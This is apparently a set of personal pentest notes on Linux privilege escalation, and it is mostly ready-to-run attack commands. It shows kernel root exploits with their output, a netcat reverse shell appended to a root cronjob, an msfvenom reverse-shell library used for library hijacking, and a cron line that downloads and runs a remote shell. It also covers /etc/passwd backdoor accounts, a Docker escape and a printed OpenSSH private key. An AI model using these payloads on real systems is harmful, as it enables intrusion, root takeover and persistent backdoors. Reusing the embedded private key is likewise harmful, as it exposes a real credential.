Skip to content

Linux Privilege Escalation

Upgrade Shell

PayloadsAllTheThings: Spawn TTY Shell

Spawning a TTY Shell

python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/usr/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/zsh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
/usr/bin/script -qc /bin/sh /dev/null
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
echo os.system('/bin/bash')
/bin/sh -i
lua: os.execute('/bin/sh')

(From within IRB)

exec "/bin/sh"

(From within vi)

:!bash

(From within vi)

:set shell=/bin/bash:shell

(From within nmap)

!sh

Nice Terminal

export TERM=xterm

^Z

stty raw -echo; fg
stty rows 42 columns 172

User Enumeration

Current User

hostname && whoami && id

Which ones have a valid shell

grep -vE "nologin|false" /etc/passwd

Folder

pwd; ls -la

OS & Architecture & Kernel

Kernel version and Architecture

uname -a
cat /etc/issue; uname -r; arch

What's the OS?

cat /etc/*-release
lsb_release -a (Debian based OSs)

Drivers & Kernel Modules

lsmod
/sbin/modinfo <name>

Compile exploit in C/C++

$ gcc -m32 Size.c -o x86-S
$ ./x86-S
Size = 4 
$ gcc Size.c -o x64-S
$ ./x64-S
Size = 8
#include<stdio.h>
int main()
{
        printf("Size = %lu", sizeof(size_t));
}

<= 2.6.36-rc8 - 'RDS Protocol'

www-data@ip:/tmp$ uname -a
Linux ip 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux

https://fareedfauzi.gitbook.io/oscp-notes/linux-post-exploitation/linux-exploitation#exploits-worth-running

https://www.exploit-db.com/raw/15285

gcc -m32 15285.c -o 15285
www-data@ip:/tmp$ ./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root)

<= 2.6.37 'Full-Nelson.

www-data@popcorn:/home/george$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/issue
cat /etc/issue
Ubuntu 9.10 \n \l

https://www.exploit-db.com/exploits/15704

www-data@popcorn:/var/www$ gcc 15704.c -o 15704
gcc 15704.c -o 15704
www-data@popcorn:/var/www$ chmod +x 15704
chmod +x 15704
www-data@popcorn:/var/www$ ./15704
./15704
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf846a280
 [+] Resolved econet_ops to 0xf846a360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# whoami
whoami
root
# 

2.6.39 < 3.2.2 (x86/x64)

www-data@hades:/tmp$ uname -a
Linux hades 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

https://www.exploit-db.com/exploits/35161

www-data@hades:/tmp$ ./35161 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2338/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Processes and Services

ps axu

How to check if port is in use in

sudo lsof -i -P -n | grep LISTEN

List all enabled services from systemctl

systemctl list-unit-files | grep enabled

Active network connection

ss -anp
netstat -antup

Binaries That AutoElevate

find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null

sudo in linux

Check sudo access

$ sudo -l
[sudo] password for Hades: 
Matching Defaults entries for pentesterlab on 7358cafc3ebe:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/bash

Mix cp/chown and chmod

https://www.adampalmer.me/iodigitalsec/2009/10/03/linux-c-setuid-setgid-tutorial

https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries

sudo -l
Matching Defaults entries for Hades:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/chmod, /bin/cp

Readable/Writable

find / -writable -type d 2>/dev/null
find / -writable 2>/dev/null

File /etc/passwd

File /etc/passwd can be modify by user permission.

ls -l /etc/passwd
$ openssl passwd 
Password: 
Verifying - Password: 
QzKsrWCYxmRPY

QzKsrWCYxmRPY : non password hash.

sed 's/root:x:/root:QzKsrWCYxmRPY:/' /etc/passwd > passwd
cat passwd > /etc/passwd
su

Generate password for new user

openssl passwd -1 -salt hades leecybersec

Credential: toor / leecybersec

echo 'toor:$1$hades$KKCtexC.plAyjcJkX7War0:0:0:root:/root:/bin/sh' >> /etc/passwd

https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation

Scheduled Tasks

ls -lah /etc/cron*
cat /etc/crontab
grep "CRON" /var/log/* 2>/dev/null

Cronjob file insecure

Cronjob file check.sh overwrite, file check.sh running as root every 1 minute.

ls -l check.sh
-rw-rw-rw- 1 root root <snip> check.sh

Can change file check.sh with user permission.

echo "rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f" >> check.sh

PATH Search Order Crontab

$ cat /etc/crontab
<snip>
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5 *   * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

==> PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

chloe@roquefort:~$ ls -ld /usr/local/bin
drwxrwsrwx 2 root staff 4096 Apr 24  2020 /usr/local/bin
cp /tmp/shell /usr/local/bin/run-parts

https://crontab.guru: */5 : "At every 5th minute."

$ sudo nc -nvlp 22
listening on [any] 22 ...
connect to [ip] from (UNKNOWN) [ip] 37228
id
uid=0(root) gid=0(root) groups=0(root)

Module Import Hijacking

Dynamic Library Hijacking

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
<snip>
  *  *  *  *  * root       /usr/bin/log-sweeper

==> LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils

[hades@hades ~]$ ls -ld /usr/local/lib/dev
drwxrwxrwx 2 root root 6 Sep  7  2020 /usr/local/lib/dev
[hades@hades ~]$ ls -l /usr/bin/log-sweeper
-rwxr-xr-x. 1 root root 8800 Sep  4  2020 /usr/bin/log-sweeper
[hades@hades ~]$ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: utils.so: cannot open shared object file: No such file or directory

exploit

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.158 LPORT=6379 -f elf-so > utils.so
[hades@hades dev]$ chmod 777 utils.so 
[hades@hades dev]$ pwd
/usr/local/lib/dev
$ sudo nc -nvlp 6379
listening on [any] 6379 ...
connect to [ip] from (UNKNOWN) [ip] 55124
id
uid=0(root) gid=0(root) groups=0(root)

Python Module Hijacking

$ cat python.py 
#!/usr/bin/python

import sys

try:
    import controller
except Exception:
    print "[!] ERROR: Unable to load controller module."
    sys.exit()

controller module not found.

Create file controller.py and add malicious python code.

echo 'import os;os.system("chmod 777 /etc/passwd")' > controller.py

Docker container

Check being a container

root@315d7648a173:/# ls -lah
<snip>
-rwxr-xr-x   1 root root    0 Jun  9 13:01 .dockerenv

Mount disk to docker machine.

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola
mount /dev/sda2 /mnt/hola
mount /dev/sda3 /mnt/hola

After mounted

Add cron job: https://github.com/MauroEldritch/GEVAUDAN/blob/master/gevaudan.rb

/sbin/mount.glusterfs ip:/gluster_shared_storage /tmp/x
echo '* * * * * root /bin/bash -c "/usr/bin/wget http://ip/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell"' > /tmp/x/snaps/gcron_enabled

Change root directory

mkdir /hdd && mount /dev/sda1 /hdd && chroot /hdd

Add ssh public key

ssh-keygen -t rsa
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAA ...key...' > /mnt/hola/root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+SK1375peajAYzOZIWV/zjsUPDs9+hxk5Ggo+cKAQKg3uImvEmQtuJKrygU03RE8EVtPw5HuViM70NLVLK2H4iSkUSSp33nWkIq1kz0yJksiKjlx2h0eXzBwQ7zeymFNr4oRvpigwEXnScOY39040h3xTqa7RikYVP4h25TtfhNExVtaZRzO6dDJSTTZurg81lkwvILHY9vw77TBP1Vsa4htYcufPKoxUDId3JllPO7Q6UTjGvlLjVf0az9Q0Kpe/D3PsAM/Wn+gCbsBkzgJ1Jhx+BFbakXto3mgdGsh3fbOLsFTX8+XTLaZNFa/faIOwUcVPvteJ2gRGe2QT6A5WV53ql3uoBnNEBwkndrWtDXyKDhPdYQXrDGZc3x2GMuM2LGkZKpM3CKv7JvUhvMj/J76380khYhFj1COOfUeQPjUmuB4Kyo5ZTDfkNXrP2CirrnGiKMOv/3hHbTSlP9t0eVQdeMQfL98NwZyRwMh9c3vQEh29PJc+BflSRJRyZhE= leecybersec@kali
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Installed and Patch Levels

dpkg -l (Debian based OSs)
rpm -qa (CentOS / openSUSE )
uname -a

Networking Enumeration

Interface and Routable

ip a
/sbin/route

Firewall and Rules

grep -Hs iptables /etc/*

Unmounted Disks

List all mounted files system

mount
cat /etc/fstab

List all disk

/bin/lsblk

Mount disk

sudo mount -o nolock 192.168.11.131:/share ~/share

Enumeration Tools

Basic Linux Privilege Escalation

https://gtfobins.github.io

https://github.com/DominicBreuker/pspy

https://github.com/rebootuser/LinEnum

https://github.com/diego-treitos/linux-smart-enumeration

http://pentestmonkey.net/tools/audit/unix-privesc-check

More Commands

history, bashrc, backup

find / -name *history* 2>/dev/null
find / -name *backup* 2>/dev/null
find / -name *bashrc* -exec grep passwod {} \; 2>/dev/null

Port Tunneling

Local Tunneling

ssh -L $myport:127.0.0.1:5985 hades@192.168.11.133 -i id_rsa

Remote Tunneling

ssh -R $myip:$myport:127.0.0.1:5985 kali@$myip -i kali-idrsa

SSH ESCAPE CHARACTERS

~C to type ssh command

Generate SSH Key

ssh-keygen -t rsa
cp id_rsa.pub authorized_keys

Add user to sudo

Create user:pass

echo -e "pass\pass" | adduser --gecos "" user
usermod -aG sudo user
sudo su - user